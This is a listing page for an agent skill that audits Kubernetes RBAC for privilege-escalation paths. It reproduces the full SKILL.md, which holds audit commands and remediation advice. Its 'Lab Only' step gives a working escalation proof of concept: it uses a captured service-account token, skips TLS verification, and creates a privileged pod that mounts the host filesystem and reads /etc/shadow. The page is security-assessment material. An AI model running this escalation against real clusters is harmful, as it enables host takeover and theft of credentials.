Agent skill

Auditing Kubernetes Rbac Privilege Escalation

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can…

Apache-2.0Auto-check passedBackend & APIs

Install Auditing Kubernetes Rbac Privilege Escalation

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill auditing-kubernetes-rbac-privilege-escalation -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills auditing-kubernetes-rbac-privilege-escalation --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/auditing-kubernetes-rbac-privilege-escalation .claude/skills/auditing-kubernetes-rbac-privilege-escalation && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
auditing-kubernetes-rbac-privilege-escalation
GitHub stars
34k
Token cost
~3k tokens
SKILL.md length
734 words
Files
5 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can…

  • Works in 7 steps: Inventory RBAC Objects → Enumerate Effective Permissions per… → Hunt the Escalation Primitives → …
  • Reviewing who can escalate privileges in a cluster
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 5 more sections
  • Runs Python scripts from its folder; calls kubectl, jq and curl; reaches github.com and kubernetes.default.svc

What it does

Auditing Kubernetes Rbac Privilege Escalation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can escalate toward cluster-admin. Use when reviewing who can escalate privileges in a cluster, hunting exploitable RoleBindings during an authorized review, or validating least privilege after an RBAC change. Keywords: RBAC, ClusterRoleBinding, service account token, auth can-i, rbac-police, escalate, bind, impersonate. Do not…

Its SKILL.md is about 3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).

It sits in Backend & APIs, covering Authorization and RBAC, Container orchestration and Red teaming and adversary simulation. It works with Kubernetes. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Reviewing who can escalate privileges in a cluster
  • Hunting exploitable RoleBindings during an authorized review
  • Validating least privilege after an RBAC change
  • Designing and applying hardened RBAC - use implementing-rbac-hardening-for-kubernetes

Example prompts

  • “Use the auditing-kubernetes-rbac-privilege-escalation skill to find over-permissive RBAC roles and service-account token abuse paths in a Kubernetes…”
  • “/auditing-kubernetes-rbac-privilege-escalation”

Requirements

  • Python 3

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. Inventory RBAC Objects
  2. Enumerate Effective Permissions per Subject
  3. Hunt the Escalation Primitives
  4. Run Automated Escalation-Path Analysis with rbac-police
  5. Trace Pods to Over-Privileged Service Accounts
  6. Demonstrate an Escalation Path (Lab Only)
  7. Report and Remediate

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • kubectl
    • jq
    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com
    • kubernetes.default.svc

    Also links to:

    • kubernetes.io

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Auditing Kubernetes Rbac Privilege Escalation loads about 3k tokens when it runs, and up to ~4.2k if it reads all its reference files. Until then it costs about 164 tokens; SKILL.md has 734 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~164
When it runs · the whole SKILL.md, loaded when a task matches
~3k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~4.2k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 734 words, ~3,023 tokens.

Download SKILL.mdSave it as .claude/skills/auditing-kubernetes-rbac-privilege-escalation/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.
name
auditing-kubernetes-rbac-privilege-escalation
description
Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can escalate toward cluster-admin. Use when reviewing who can escalate privileges in a cluster, hunting exploitable RoleBindings during an authorized review, or validating least privilege after an RBAC change. Keywords: RBAC, ClusterRoleBinding, service account token, auth can-i, rbac-police, escalate, bind, impersonate. Do not use for designing and applying hardened RBAC - use implementing-rbac-hardening-for-kubernetes.
domain
cybersecurity
subdomain
container-security
tags
kubernetes, rbac, privilege-escalation, service-account, least-privilege, kubectl, access-control, attack-paths
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.AA-05
mitre_attack
T1078

Auditing Kubernetes RBAC Privilege Escalation

Legal Notice: This skill is for authorized security testing and educational purposes only. Enumerating and exercising RBAC permissions affects a live cluster's access posture. Only test clusters you own or are explicitly authorized in writing to assess.

Overview

Kubernetes Role-Based Access Control (RBAC, MITRE ATT&CK T1078 Valid Accounts) governs what every user and service account may do via Role/ClusterRole rules bound by RoleBinding/ClusterRoleBinding. Because workloads run with a mounted service-account token by default, an attacker who compromises one pod inherits that account's RBAC rights. Over-permissive bindings turn a single compromised pod into a cluster takeover: certain verbs and resources are "RBAC-equivalent to cluster-admin."

Per the Kubernetes "RBAC Good Practices" guidance and Unit 42 research, the dangerous primitives are:

  • escalate on roles — grant yourself any permission, even ones you do not hold.
  • bind on clusterroles — create a binding to cluster-admin.
  • impersonate on users/groups/serviceaccounts — act as any subject including system:masters.
  • create/update/patch on pods — schedule a privileged pod or mount the node, escaping to the host (T1611).
  • create on pods/exec, pods/attach, pods/ephemeralcontainers — run code in any existing pod.
  • get/list/watch on secrets — list returns full secret contents, including other service-account tokens.
  • create on serviceaccounts/token — mint tokens for more privileged accounts.
  • update/patch on validatingwebhookconfigurations/mutatingwebhookconfigurations, nodes/proxy, certificatesigningrequests/approval — admission/CSR abuse to cluster-admin.
  • Wildcards (verbs: ["*"], resources: ["*"]) — implicit super-privilege.

This skill systematically enumerates effective permissions for every subject, maps which subjects hold these escalation primitives, and produces remediation evidence. Source: Kubernetes RBAC Good Practices; Unit 42 Kubernetes RBAC research.

When to Use

  • During an authorized Kubernetes security assessment or cluster penetration test
  • After compromising a pod, to determine what its service-account token can reach
  • When reviewing RBAC drift before a production go-live
  • When validating least-privilege after a platform migration or Helm rollout

Prerequisites

  • kubectl configured against the target cluster (your own credentials, or a captured service-account token)
  • Read access to RBAC objects (most audits run with a cluster-reader or admin context)
  • Audit tooling:
    bash
    # rbac-police - find escalation paths (Cymulate)
    curl -L https://github.com/PaloAltoNetworks/rbac-police/releases/latest/download/rbac-police-linux-amd64 -o rbac-police
    chmod +x rbac-police
    
    # kubectl-who-can - which subjects can perform an action (Aqua)
    kubectl krew install who-can
    
    # rakkess - access matrix of resources x verbs for the current/another subject
    kubectl krew install access-matrix
    
    # rbac-lookup - which roles a subject has (FairwindsOps)
    kubectl krew install rbac-lookup

Objectives

  • Inventory all Role, ClusterRole, RoleBinding, and ClusterRoleBinding objects
  • Enumerate effective permissions per subject using kubectl auth can-i --as
  • Identify subjects holding RBAC-equivalent-to-admin primitives
  • Trace token-mounting pods to over-privileged service accounts
  • Demonstrate (in a lab) one escalation path end-to-end
  • Output a prioritized findings report with least-privilege remediation

MITRE ATT&CK Mapping

Technique IDNameTactic
T1078Valid AccountsDefense Evasion / Persistence / Privilege Escalation
T1098Account ManipulationPersistence
T1528Steal Application Access TokenCredential Access
T1613Container and Resource DiscoveryDiscovery
T1611Escape to HostPrivilege Escalation

Workflow

Step 1: Inventory RBAC Objects
bash
# All roles and bindings, cluster-wide
kubectl get clusterroles,clusterrolebindings -o wide
kubectl get roles,rolebindings --all-namespaces -o wide

# Dump full RBAC for offline analysis
kubectl get clusterroles,clusterrolebindings,roles,rolebindings \
  --all-namespaces -o yaml > rbac-dump.yaml

# Who is bound to cluster-admin?
kubectl get clusterrolebindings -o json | \
  jq -r '.items[] | select(.roleRef.name=="cluster-admin") |
         .metadata.name + " -> " + (.subjects // [] | map(.kind+"/"+.name) | join(","))'
Show full SKILL.md (324 more words)Show less
Step 2: Enumerate Effective Permissions per Subject

kubectl auth can-i is the authoritative check because it evaluates the live authorizer (RBAC + webhooks). Use --as to impersonate a subject (requires impersonate rights for the audit identity).

bash
# Full access matrix for a service account
kubectl auth can-i --list \
  --as=system:serviceaccount:default:default

# Targeted dangerous-permission probes
kubectl auth can-i create pods --all-namespaces \
  --as=system:serviceaccount:dev:builder
kubectl auth can-i get secrets --all-namespaces \
  --as=system:serviceaccount:dev:builder
kubectl auth can-i create serviceaccounts/token -n kube-system \
  --as=system:serviceaccount:dev:builder
kubectl auth can-i '*' '*' --all-namespaces \
  --as=system:serviceaccount:dev:builder

# rakkess full verb x resource matrix for a subject
kubectl access-matrix --as system:serviceaccount:dev:builder
Step 3: Hunt the Escalation Primitives
bash
# Who can perform each dangerous action across the cluster?
kubectl who-can create pods
kubectl who-can '*' '*'                      # wildcard god-mode holders
kubectl who-can get secrets
kubectl who-can list secrets
kubectl who-can create pods/exec
kubectl who-can impersonate users
kubectl who-can create serviceaccounts/token
kubectl who-can update clusterrolebindings   # bind-style escalation

# grep the raw dump for escalate/bind/impersonate verbs and wildcards
grep -nE 'escalate|impersonate|"\*"|- bind' rbac-dump.yaml
Step 4: Run Automated Escalation-Path Analysis with rbac-police

rbac-police evaluates Rego policies over a cluster snapshot to surface principals that can escalate to cluster-admin and the exact path.

bash
# Run all built-in escalation checks (needs a kubeconfig with read access)
./rbac-police eval ./lib/policies/

# Only the privilege-escalation policy, severe findings as JSON
./rbac-police eval ./lib/policies/can_escalate.rego -f json -o findings.json

# Collect a snapshot first (offline analysis / air-gapped review)
./rbac-police collect -o cluster-snapshot.json
./rbac-police eval ./lib/policies/ --collect-results cluster-snapshot.json
Step 5: Trace Pods to Over-Privileged Service Accounts

A finding only matters if a reachable workload mounts that token.

bash
# Map every pod to its service account
kubectl get pods --all-namespaces \
  -o custom-columns='NS:.metadata.namespace,POD:.metadata.name,SA:.spec.serviceAccountName'

# Find pods that auto-mount tokens (the default) tied to risky SAs
kubectl get pods --all-namespaces -o json | jq -r '
  .items[] | select(.spec.automountServiceAccountToken != false) |
  "\(.metadata.namespace)/\(.metadata.name) -> \(.spec.serviceAccountName // "default")"'

# rbac-lookup: what does that service account actually hold?
kubectl rbac-lookup builder --kind serviceaccount
Step 6: Demonstrate an Escalation Path (Lab Only)

Example: a service account with create pods and access to a node can schedule a privileged pod that mounts the host filesystem.

bash
# Using a captured token, target the API server directly
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
export APISERVER=https://kubernetes.default.svc

# Confirm the dangerous right
kubectl --token="$TOKEN" --server="$APISERVER" --insecure-skip-tls-verify \
  auth can-i create pods

# Schedule a privileged host-mounting pod (proves node/host takeover)
cat <<'EOF' | kubectl --token="$TOKEN" --server="$APISERVER" \
  --insecure-skip-tls-verify apply -f -
apiVersion: v1
kind: Pod
metadata: {name: escalate-poc, namespace: default}
spec:
  containers:
  - name: x
    image: alpine
    command: ["/bin/sh","-c","cat /host/etc/shadow; sleep 1d"]
    securityContext: {privileged: true}
    volumeMounts: [{name: host, mountPath: /host}]
  volumes: [{name: host, hostPath: {path: /}}]
EOF
kubectl logs escalate-poc   # host /etc/shadow proves escalation
Step 7: Report and Remediate
bash
# Generate a least-privilege-violation summary
kubectl get clusterrolebindings -o json | jq -r '
  .items[] | select(.roleRef.name=="cluster-admin") |
  "FINDING cluster-admin bound to: " +
  ((.subjects // []) | map(.kind+":"+.name) | join(", "))'

Remediation: replace wildcards with explicit verbs/resources; remove escalate/bind/impersonate unless required; set automountServiceAccountToken: false on workloads that do not call the API; scope Role (namespaced) over ClusterRole where possible; use aggregationRule carefully.

Tools and Resources

ToolPurposeSource
kubectl auth can-iAuthoritative live permission check (--list, --as)https://kubernetes.io/docs/reference/access-authn-authz/authorization/
rbac-policeRego-based escalation-path analysishttps://github.com/PaloAltoNetworks/rbac-police
kubectl-who-canReverse lookup: who can do Xhttps://github.com/aquasecurity/kubectl-who-can
rakkess (access-matrix)Verb x resource matrix per subjecthttps://github.com/corneliusweig/rakkess
rbac-lookupRoles a subject holdshttps://github.com/FairwindsOps/rbac-lookup
Kubernetes RBAC Good PracticesAuthoritative escalation primitive listhttps://kubernetes.io/docs/concepts/security/rbac-good-practices/

Dangerous RBAC Primitives Reference

Verb / ResourceWhy It Is Cluster-Admin-Equivalent
escalate on rolesGrant self any permission
bind on clusterrolesBind self to cluster-admin
impersonate users/groupsAct as system:masters
create pods (+ node access)Privileged/hostPath pod -> host takeover
create pods/exec,pods/attachRun code in existing pods
get/list secretsRead all tokens & credentials
create serviceaccounts/tokenMint privileged tokens
*/* (wildcards)Implicit super-privilege

Validation Criteria

  • All Role/ClusterRole/Binding objects inventoried and dumped
  • cluster-admin subject list enumerated
  • Effective permissions enumerated per service account via auth can-i --list
  • All dangerous-primitive holders identified (escalate/bind/impersonate/secrets/pods)
  • rbac-police escalation paths reviewed
  • Token-mounting pods mapped to risky service accounts
  • At least one escalation path demonstrated in a lab
  • Findings report with least-privilege remediation produced
  • All testing stayed within authorized scope

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 4 other files (scripts, references) in skills/auditing-kubernetes-rbac-privilege-escalation of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • references/standards.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Auditing Kubernetes Rbac Privilege Escalation next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Auditing Kubernetes Rbac Privilege Escalation compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Auditing Kubernetes Rbac Privilege Escalation this skillmukul975/Anthropic-Cybersecurity-Skills34k—~3kAutomated safety check: PassApache-2.0
K8s Security PoliciesCybereason-Public/owLSM28012 repos~2kAutomated safety check: PassGPL-2.0
Gke Workload Identitygoogle/skills21k—~4.4kAutomated safety check: PassApache-2.0
Operate Kubernetes Toolchaincyberful/cyberful135—~898Automated safety check: PassAGPL-3.0
Kubernetes Rbac Analyzerjeremylongshore/tons-of-skills-marketplace2.8k—~590Automated safety check: PassMIT
K8s Istio Bypasswgpsec/AboutSecurity1.8k—~727Automated safety check: PassNone

Similar skills

  • K8s Security Policies

    Cybereason-Public/owLSM

    Comprehensive guide for implementing NetworkPolicy, PodSecurityPolicy, RBAC, and Pod Security Standards in Kubernetes.

    280 GitHub starsUsed in 12 repos~2k tokens
    Backend & APIsAuto-check passed
  • Official

    Configures and diagnoses Workload Identity Federation for GKE authentication failures for Pods (403 "iam.serviceAccounts.getAccessToken" / permission denied, "could not find default credentials", or…

    21k GitHub stars~4.4k tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • Operate kubectl, kube-bench, Trivy, Prowler, and manifest/runtime evidence for advanced Kubernetes security assessment.

    135 GitHub stars~898 tokensUpdated 1 mo ago
    DevOps & CloudAuto-check passed
  • Kubernetes Rbac Analyzer

    jeremylongshore/tons-of-skills-marketplace

    Analyze kubernetes rbac analyzer operations. An agent skill from jeremylongshore/tons-of-skills-marketplace.

    2.8k GitHub stars~590 tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • K8s Istio Bypass

    wgpsec/AboutSecurity

    Istio Service Mesh 安全策略绕过。当目标 K8s 集群使用 Istio、请求被 AuthorizationPolicy 拒绝(403 RBAC denied)、或发现 Envoy sidecar 时使用。核心手法:UID 1337 绕过 Envoy。任何在 K8s 中遇到 Istio 策略阻拦、Service Mesh 限制、或 Envoy 相关安全控制的场景都应使用此技能

    1.8k GitHub stars~727 tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • Mirrord Operator

    metalbear-co/mirrord

    Help users install and configure the mirrord Operator for team/enterprise environments.

    5.4k GitHub starsUsed in 1 repo~4.6k tokens
    DevOps & CloudAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Questions about Auditing Kubernetes Rbac Privilege Escalation

What does Auditing Kubernetes Rbac Privilege Escalation do?

Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can…. Auditing Kubernetes Rbac Privilege Escalation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Finds over-permissive RBAC roles and service-account token abuse paths in a Kubernetes cluster using kubectl auth can-i, rbac-police, kubectl-who-can, and rakkess, tracing which subjects can escalate toward cluster-admin.

When should I use Auditing Kubernetes Rbac Privilege Escalation?

Auditing Kubernetes Rbac Privilege Escalation fits situations like: reviewing who can escalate privileges in a cluster; hunting exploitable RoleBindings during an authorized review; validating least privilege after an RBAC change; designing and applying hardened RBAC - use implementing-rbac-hardening-for-kubernetes.

How do I install Auditing Kubernetes Rbac Privilege Escalation in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill auditing-kubernetes-rbac-privilege-escalation -a claude-code`. Or copy the skill folder (skills/auditing-kubernetes-rbac-privilege-escalation in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/auditing-kubernetes-rbac-privilege-escalation in your project. Claude Code loads it when a task matches its description.

How do I install Auditing Kubernetes Rbac Privilege Escalation in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill auditing-kubernetes-rbac-privilege-escalation -a codex`. Or copy the skill folder (skills/auditing-kubernetes-rbac-privilege-escalation in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/auditing-kubernetes-rbac-privilege-escalation in your project. Codex loads it when a task matches its description.

Can I use Auditing Kubernetes Rbac Privilege Escalation in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill auditing-kubernetes-rbac-privilege-escalation -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/auditing-kubernetes-rbac-privilege-escalation, .gemini/skills/auditing-kubernetes-rbac-privilege-escalation, .github/skills/auditing-kubernetes-rbac-privilege-escalation and .opencode/skills/auditing-kubernetes-rbac-privilege-escalation in your project.

What does Auditing Kubernetes Rbac Privilege Escalation need to run?

Going by SKILL.md and its folder, Auditing Kubernetes Rbac Privilege Escalation needs Python for the scripts in its folder and the command-line tools its instructions call (kubectl, jq and curl). Our summary lists: Python 3.

Does Auditing Kubernetes Rbac Privilege Escalation access the network?

SKILL.md names 3 domains. In commands or code: github.com and kubernetes.default.svc; the agent is likely to contact these when it follows the instructions. As links in the text: kubernetes.io. This is read from the text; nothing was executed.

Is Auditing Kubernetes Rbac Privilege Escalation safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Auditing Kubernetes Rbac Privilege Escalation use?

Auditing Kubernetes Rbac Privilege Escalation is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Auditing Kubernetes Rbac Privilege Escalation use?

About 3k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.2k tokens, read only when the agent opens those files.

What are the alternatives to Auditing Kubernetes Rbac Privilege Escalation?

Skills that share tags, products or a category with Auditing Kubernetes Rbac Privilege Escalation: K8s Security Policies (Cybereason-Public/owLSM, 280 stars), Gke Workload Identity (google/skills, 21k stars), Operate Kubernetes Toolchain (cyberful/cyberful, 135 stars) and Kubernetes Rbac Analyzer (jeremylongshore/tons-of-skills-marketplace, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Auditing Kubernetes Rbac Privilege Escalation?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.